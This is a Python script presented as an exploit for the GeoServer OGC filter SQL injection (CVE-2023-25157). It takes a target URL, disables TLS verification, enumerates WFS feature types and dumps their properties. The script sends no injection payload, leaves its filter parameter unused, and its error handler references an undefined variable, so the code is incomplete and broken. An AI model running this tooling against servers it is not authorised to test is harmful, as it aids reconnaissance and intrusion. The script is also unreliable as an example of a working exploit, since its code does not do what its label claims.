CVE-2023-25157.py

import argparse
import requests
import sys
import xml.etree.ElementTree as ET
import json
import urllib3
import colorama
from colorama import Fore, Style

urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
colorama.init()

class GeoServerSQLI():
    def __init__(self,url):        
        self.url=url 

    def getFeatures(self):
        try:
            response = requests.get(self.url + "/geoserver/ows?service=WFS&version=1.0.0&request=GetCapabilities", verify=False)
            response.raise_for_status()
            if(response.status_code == 200):
                root = ET.fromstring(response.text)
                feature_types = root.findall('.//{http://www.opengis.net/wfs}FeatureType')
                namesFeatures = [feature_type.findtext('{http://www.opengis.net/wfs}Name') for feature_type in feature_types]
                return namesFeatures
            else:
                print(f"{Fore.RED}Failed to retrieve XML data{Style.RESET_ALL}")
                return None
        except requests.exceptions.RequestException as e:
            print(f"{Fore.RED}Failed to retrieve XML data: {e}{Style.RESET_ALL}")
            sys.exit(1)

    def getProperties(self,namesFeatures,ql_filters="strStartsWith"):
        for name in namesFeatures:
            try:
                endpoint = f"/geoserver/ows?service=wfs&version=1.0.0&request=GetFeature&typeName={name}&maxFeatures=1&outputFormat=json"
                response = requests.get(self.url + endpoint, verify=False)
                response.raise_for_status()  

                try:
                    json_data = response.json()
                    features_list = json_data['features']

                    print(f"\n{Fore.BLUE} Properties for {name}:{Style.RESET_ALL}")

                    for feature in features_list:
                        properties_list = feature['properties']
    
                        for key, value in properties_list.items():
                            print(f"{Fore.GREEN}{key}:{Fore.YELLOW} {value}{Style.RESET_ALL}")

                
                except json.JSONDecodeError:
                    print(f"{Fore.RED}Failed to parse JSON response for {name} with CQL_FILTER: {cql_filter}{Style.RESET_ALL}")
                    continue 
            except requests.exceptions.RequestException as e:
                pass
            except KeyboardInterrupt:
                print(f"\n{Fore.RED}Process Terminated by User{Style.RESET_ALL}")
                exit(0)

def arguments():
    parser = argparse.ArgumentParser(description="GeoServer OGC Filter SQL Injection Vulnerabilities Exploit")
    parser.add_argument("url", type=str, help="URL of the target GeoServer")
    return parser.parse_args()

def main():
    args = arguments()
    CVE_2023_25157 = GeoServerSQLI(args.url)
    namesFeatures = CVE_2023_25157.getFeatures()
    if(namesFeatures):
        CVE_2023_25157.getProperties(namesFeatures)

if __name__ == "__main__":
    main()